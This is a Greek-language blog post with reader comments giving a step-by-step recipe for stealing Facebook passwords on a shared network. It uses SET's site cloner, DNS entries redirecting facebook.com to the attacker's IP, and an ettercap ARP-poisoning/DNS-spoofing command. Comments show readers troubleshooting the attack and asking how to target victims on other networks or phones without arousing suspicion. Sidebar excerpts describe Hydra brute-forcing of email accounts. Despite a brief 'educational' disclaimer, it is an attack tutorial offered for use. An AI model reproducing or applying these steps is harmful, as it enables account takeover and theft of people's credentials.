Μετάβαση στο κύριο περιεχόμενο

Crack password facebook with backtrack 5 R3

Crack password backtrack 5 R3Καλησπέρα σε όλους σήμερα θα δούμε ένα νέο τρόπο που μπορεί να χάσει ο χρήστης τα στοιχεία χωρίς να χρειαστεί ο cracker να του στείλει την ip όπως στον πιο παλιό οδηγό. Το παλιό οδηγό για το φβ μπορείτε να τον δείτε εδώ: σπάσιμο κωδικού στο facebook.
του (username και password)

Ο οδηγός είναι καθαρά για λόγους εκπαίδευσης και προστασίας. Μπορεί να χρησιμοποιηθεί σε όποιο δήποτε website και όχι μόνο στο facebook. Μην επιχειρήσετε να τον χρησιμοποιήσετε για να κλέψετε το password άλλου χρήστη. Για να έχετε την μέγιστη ασφάλεια μην σερφάρετε σε δημόσια wifi. Τα ασύρματα δίκτυα σήμερα εκτός από τα καλά που μας προσφέρουν είναι ένα πολύ επικίνδυνο μέσο, ειδικά αν δεν προσέχουμε σε ποιο wireless μπαίνουμε.

Οι εντολές που γράφω είναι:

  1. cd /pentest/exploits/set/
  2. ./set (μετά επιλέγετε ότι και εγώ στο βίντεο)
  3. locate etter.dns
  4. pico "εδώ αντιγράφετε ότι και εγώ στον οδηγό"
  5. ettercap -T -q -i wlan0 -P dns_spoof -M arp //

Όπως θα διαπιστώσετε βλέποντα το βίντεο θα χρειαστείτε σε κάποια φάση να προσθέσετε τα πιο κάτω στοιχεία:
(ip address βάζετε την δική σας)
http:/www.facebook.com A 192.168.1.5
https:/www.facebook.com A 192.168.1.5
www.facebook.com A 192.168.1.5
*.facebook.com A 192.168.1.5
facebook.com A 192.168.1.5

Δείτε τον οδηγό βίντεο: facebook cracker password


Σχόλια

  1. καλησπέρα Παναγιώτη.

    Θέλω αν μπορείς,να μου λύσεις την εξής απορία:

    στο σημείο που γράφεις με μπλε γράμματα(λινκ)"σπάσιμο κωδικού στο facebook" πως μπορώ να βάλω και γω κάτι τέτοιο στο μπλόγκ μου.

    Δηλαδή αντί να ποστάρω π.χ. διαβάστε εδώ:http:// www.......com να το ποστάρω όπως εσύ.

    ΑπάντησηΔιαγραφή
  2. καλησπέρα παναγιώτη και σε ευχαριστούμε πολύ για την προσπάθεια σου ... θα ήθελα να μου λύσεις ένα μυστήριο ... ακολουθώ τα βήματα σου ένα προς ένα αλλά κολλάω στο ifconfig .. μου βγάζει λίγο διαφορετικό το μενού και δεν μου δείχνει την ip μου .. προσπάθησα να την βάλω και χειροκίνητα αλλά δεν γίνεται τίποτα ...

    ΑπάντησηΔιαγραφή
  3. Παύλο αυτό που θες μπορείς να το βάλεις με την ετικέτα a...

    Γρηγόρη καλησπέρα.. για να σου εμφανίσει την ip σου πρέπει να είσαι συνδεδεμένος σε κάποιος δίκτυο, αν δεν είσαι για αυτό δεν βλέπεις την ip σου.

    ΑπάντησηΔιαγραφή
  4. καλησπέρα και πάλι παναγιώτη .. όταν λές να είμαι συνδεδεμένος σε ένα δίκτυο τι εννοείς ? για να σου δώσω να καταλάβεις προσπαθώ απο το σταθερό μου να το κάνω στο λαπτοπ και συνεχίζει τα ίδια ... είμαι συνδεδεμένος και στους 2 ασύρματα ..

    ΑπάντησηΔιαγραφή
  5. καλησπερα δας. Λεγομαι Αντωνης και σας συγχαιρω για την προσπαθεια σας. Προσπαθησα να κανω αυτα που γραφετε αλλα μου βγαζει οτι δεν αναγνωριζει συσκευες και τετοια. Μηπως πρεπει να εχεις ειδικη καρτα γραφικων η καποιο συγκεκριμενο λαπτοπ η PC για να γινει αυτη η διαδικασια? οσοες φορες προσπαθησα δεν το πετυχα παντως. Μπορειτε να βοηθησετε?

    ΑπάντησηΔιαγραφή
  6. Gregory είσαι συνδεδεμένος στο ίδιο ρούτερ και στους 2 υπολογιστές;

    Καλησπέρα Αντώνη. Συνήθως την κάρτα δικτύου δεν την διαβάζει η εικονική μηχανή. Αν θες μπορείς να το εγκαταστήσεις απευθείας στον υπολογιστή σου ή να πάρεις μια εξωτερική κάρτα. Η rtl8187 είναι μια καλή κάρτα η οποία αναγνωρίζεται

    ΑπάντησηΔιαγραφή
  7. panagioti epikinonise se parakalo mazi m.
    hackerser.ram@hotmail.com

    ΑπάντησηΔιαγραφή
  8. kalhspera otan eisai omws apo diaforetiko duktio pws mporeis n vreis tn kwdiko t??

    ΑπάντησηΔιαγραφή
  9. ΠΑΝΑΓΙΩΤΗ ΒΟΗΘΕΙΑ!!!ΟΥΤΕ ΕΜΕΝΑ ΔΕΝ ΒΡΙΣΚΕΙ ΤΟ WLAN0!!!

    ΑπάντησηΔιαγραφή
  10. Καλησπερα.. Παναγιωτη τα κανω ολα σωστα αλλα μολις παω να μπω στο facebook λογω του πρωτοκολλου https δεν μπαινει μεσα απο το δικο μου pc... αν στειλω την ip μου ομως μπαινει.... τι πρεπει να κανω??

    ΑπάντησηΔιαγραφή
  11. paidia mipos sto back prepei na patiso pano sto install gia na to kano,oti grafeis den mou to pianei

    root@bt:
    bash:cd /pentest/exploits/set/ :no such file or directory

    ti simainei pali ayto?

    ΑπάντησηΔιαγραφή
  12. Σημαίνει ότι πολύ απλά έκανες ανανέωση στο λειτουργικό και πλέον πρέπει να ξανα εγκαταστήσεις το social engineer toolkit.



    ΓΡΑΦΕΤΕ ΜΕ ΕΛΛΗΝΙΚΑ !!!!!!!!!!!!!

    ΑπάντησηΔιαγραφή
  13. Αυτό το σχόλιο αφαιρέθηκε από τον συντάκτη.

    ΑπάντησηΔιαγραφή
  14. Γεια σου Παναγιώτη θέλω μια διευκρινίσει από ότι κατάλαβα το backtrack το χρησιμοποιήσεις μόνο από το υπολογιστή όπου σκοπεύει να συνδεθεί ο χρήστης όπου σκοπεύουμε να hakaroymai ,γιατί δεν έδειξες πως στέλνεις την ψεύτικη εικονική εικόνα(fb) σε ένα άλλο υπολογιστή παρά μόνο στο υπολογιστή σου, δεν έδειξες με ποιο τρόπο μπορεί να γίνει αυτό αν μπορεί να γίνει το έκανες αποκλειστικά στο pc σου δεν το έστειλες σε κάποιο εξωτερικό pc (και αν τελικά μπορεί να σταλθεί σε εξωτερικό pc ώστε ο χρηστείς να πέσει στην παγίδα δεν διώχνεις το τρόπο με τον όποιο μπορεί να σταλεί !! ζητώ συγνώμη για την ενόχληση !!

    ΑπάντησηΔιαγραφή
  15. Hi Panagioti epikinonise se parakalw mazi mou

    ΑπάντησηΔιαγραφή
  16. Παναγιωτη βοηθεια οταν παταμε "2 site cloner" πρεπει να γραψουμε την ip μας δεν μου βγαζει εμενα τετοια επιλογη τι πρεπει να κανω?

    ΑπάντησηΔιαγραφή
  17. Καλησπερα λεγομαι Κωνσταντινος.Ακολουθησα με ακριβεια την καθοδηγηση σου απο το βιντεο ,συνδεθικα στο ιδιο ρουτερ με το λαπτοπ μου απο το backtrack ,αλλα οταν εγραψα τα στοιχεια μου στο facebook (email,password) συνδεθικα κανονικα.Δεν ειπιρχε τιποτε γραμμενο στο backtrack οταν κοιταξα.Τι φτεει;

    ΑπάντησηΔιαγραφή
  18. γεια σου φιλε. ακριβως το ιδιο προβλημα εχω με τον παλικαρι παραπανο koctakos kiato ενω ειχα κανει σωστα ολα τα βηματα που εξηγουσες αλλα ματαια δεν εγινε κατι. το δοκιμασα και με το αλλο τροπο που εξηγουσες στο προτο βιντεο και παλι ομως στο μπακτρακ δεν μου εστιλε ιμαιλ κωδικο. http://www.sendspace.com/file/ior0la <--- αν μπορεις φιλε ριξε μια ματια οταν εχεις χρονο. ευχαριστω πολι το βιντεο μετραι πολι .

    ΑπάντησηΔιαγραφή
  19. Αν είστε όντως συνδεδεμένη στο ίδιο δίκτυο σημαίνει κάπου κάνατε λάθος. Η ip που δώσατε είναι σίγουρα σωστή;

    ΑπάντησηΔιαγραφή
  20. αδερφε σου στελνο μια εγγραφη που εκανα με αθτη τιν διαδικασια οταν μπορεσεις ριξε μια ματια. πιστευο πως τα εκανα σωστα και οσο για το ιδιο δυχτιο που λες, στο μπακτρακ ειμαι σινδεδεμενος στο ντιφολτ που λει διλαδι εχω ιντερνετ μεσο τις γραμμης που σινδεομε και στο υ/π αφου ειναι ντιφολτ σημενη οτι ειναι ι ιδια γραμμη και στα 2. δοκιμασα και τιν περιπτοσι να ειμαι σινδεδεμνος στο ιντερνετ μονο στο μπακτρακ αλλα παλι τα ιδια αποτελεσματα ειχα. http://www.sendspace.com/file/38hbci <---- τσεκ

    ΑπάντησηΔιαγραφή
  21. φιλος περιμενο μια απαντιση. σε παρακαλω βρες λιγο χρονο και δες το βιντεακι.. ευχαριστω

    ΑπάντησηΔιαγραφή
  22. αφου το εγκαταστησω,ετσι οπως δειχνεις και εσυ,μετα πως το κλεινω τι κανω???θελω να πω οτι,καθε φορα που το χρειαζομαι πρεπει να κανω ολη αυτη την διαδικασια??
    ευχαριστω

    ΑπάντησηΔιαγραφή
  23. Παναγιωτη καλησπερα. Καταρχας να σε συγχαρω για την δουλεια σου ειναι ιδιαιτερα κατατοπιστικη. Εχω μια σχετικη απορια:
    Ανοιγω κανονικα το backtrack και δημιουργω το site cloner. Στελνω το link(ip) σε καποιον δοκιμαστικα αλλα δεν του ανοιγει η σελιδα. Επισης, θελω να μου πεις τι γινεται στην περιπτωση που ο αλλος συνδεεται μεσω κινητου τηλεφωνου κ μονο. Λειτουργει το ιδιο; Σ ευχαριστω εκ των προτερων.

    ΑπάντησηΔιαγραφή
  24. Καλησπέρα Παναγιώτη. Ασχολούμαι εδώ και αρκετές μέρες. Ήθελα να ρωτήσω, αν γίνεται να σπάσω τον κωδικό κάποιου χρήστη που ΔΕΝ είμαστε στο ίδιο δύκτιο, χωρίς να του στείλω μήνυμα ή κάτι παρόμοιο που θα μπορούσε να κινήσει τις υποψίες;; Από ότι είδα στο βιντεάκι εσύ μόνο μέσω μηνύματος το κάνεις.

    ΑπάντησηΔιαγραφή
  25. KALISPERA KATARXAS NA PO POS KANETE KATPLIKTIKI DOYLIA I APORIA MOY EINAI OTAN PATAO IFCONFIG DEN MOY BGAZI TIN KARTA DIXTIOY GIATI ??? MIPOS PREPI NA KANO KAPIA RITHMISI PLEASE PITEMOY

    ΑπάντησηΔιαγραφή
  26. Καλημέρα...ήθελα να ρωτήσω αν αυτός ο οδηγός δουλεύει κ για κινητά που συνδέονται στο ίδιο δίκτυο...δλδ αν πάρω την ip που έχει το κιν που συνδέθηκε στο δίκτυο μου κ κάνει login sto fb θα δουλέψει....? Υπόψιν ότι συνδέομαι στο fb από το κιν μου με την εφαρμογή android του facebook!

    ΑπάντησηΔιαγραφή

Δημοσίευση σχολίου

Όλες οι απορίες πλέον θα λύνονται μόνο μέσα στο φόρουμ το οποίο μπορείτε να βρείτε εδώ http://forum.click4money.gr/
Ο λόγος είναι για να μαζεύεται όλο το υλικό εκεί και να μην απαντάμε συνέχεια στα ίδια ερωτήματα

Δημοφιλείς αναρτήσεις από αυτό το ιστολόγιο

Σπάσιμο κωδικών email και τρόποι προστασίας αυτών

Καλησπέρα φίλοι και αναγνώστες του  blog μου, σήμερα θα σας δείξω ένα οδηγό βίντεο με τον οποίο μπορεί κάποιος να μας κλέψει τον κωδικό του email μας όπως επίσης και τρόπους με τους οποίους μπορούμε να προστατευτούμε. Με αυτό το τρόπο μπορούμε να ανιχνεύσουμε  κωδικούς hotmail, windows live και gmail . Στον οδηγό βίντεο σας δείχνω για hotmail που με τον ίδιο τρόπο γίνετε και για τα windows live.  Για gmail στην επιλογή "Single target" που σας δείχνω στο βίντεο αντί για "pop3.live.com" βάζουμε "smtp.gmail.com", στην "Port" βάζουμε 465, και στο "Protocol" βάζουμε "smtp", επίσης βάζουμε τικ και στην επιλογή "Be verbose", τα άλλα τα κάνουμε όπως και στο βίντεο. Θα χρειαστούμε  Backtrack ( το backtrack το κατεβάζετε εδώ ή  εδώ για torrent ). Το προγραμμάτακι "Hydra-gdk" το οποίο είναι ενσωματωμένο στο backtrack, θα το βρείτε στο μενού => Application-Backtrack-Privilege Escalation- Passwo

Σπάσιμο κωδικών facebook

Πώς μπορεί κάποιος να σας κλέψει τον κωδικό του Facebook (hack facebook). Παρακάτω σας έφτιαξα ένα βίντεο που μου ζητήσατε για το πως σπάμε κωδικούς στο facebook εύκολα. Με ένα απλό τρόπο μπορεί να σας κλέψουν το κωδικό του facebook . Το βίντεο είναι καθαρά για εκπαιδευτικούς σκοπούς.   Τον οδηγό αυτό κυρίως τον έφτιαξα για αρχάριους, να μπορούν να δουν ένα από τους πολλούς τρόπους που μπορεί κάποιος έμπειρος hacker να κλέψει τον κωδικό του ς. Μετά από το βίντεο θα έχετε μια άλφα γνώση και θα μπορείτε να προστατευτείτε. Τα εργαλεία που θα χρειαστείτε για να το κάνετε και εσείς :   http://lefta4klik.blogspot.gr/2012/12/spasimo-kodikon-crack-wep.html Όποιος έχει απορίες για το πως να σπάσω κωδικό facebook ας αφήσει σχόλιο να το βοηθήσουμε. Σημείωση : Η τεχνική αυτή δουλεύει όταν οι υπολογιστές βρίσκονται στο ίδιο δίκτυο.  Πώς σπάμε κωδικούς του φβ - Δείτε τον οδηγό βίντεο Μπορείτε να δείτε και τον νέο οδηγό όπου γίνετε να σπάσει το facebook χωρίς να χρειαστεί να σταλ

Εγκατάσταση backtrack στα windows με βοήθεια εικονικής μηχανής

Καλησπέρα φίλοι μου, σήμερα σας έχω φτιάξει το βίντεο που μου ζητήσατε κάποιοι που είχατε δυσκολίες στην εγκατάσταση του  backtrack  σε εικονική μηχανή για να τρέχουνε στα windows. Είναι πάρα πολύ απλό, θα το δείτε στην συνέχεια στο video. Την εικονική μηχανή που έχω και εγώ για να τρέχουνε τα backtrack στα windows:  Κατεβάστε την εδώ . Τα Backtrack τα κατεβάζετε από εδώ . Κατεβάστε την τελευταία έκδοση δηλαδή το backtrack 5 R3. Επίσης σας έχω και μια εναλλακτική λύση εικονικής μηχανής που θα δείτε κάτω από το βίντεο, όπου μπορείτε να δείτε  οδηγίες για να κατεβάσετε και να τρέξετε το backtrack στο virtualbox της oracle. Εγκατάσταση backtrack σε εικονική μηχανή - Δείτε τον οδηγό βίντεο Μπορείτε αν θέλετε να κατεβάσετε την εικονική μηχανή (virtualbox) της oracle που είναι επίσης πολύ καλή και είναι δωρεάν. Κατεβάστε την από εδώ  https://www.virtualbox.org/wiki/Downloads . Όταν κατεβεί το κάνετε εγκατάσταση και δημιουργείτε μια εικονική μηχανή στο virtualbox της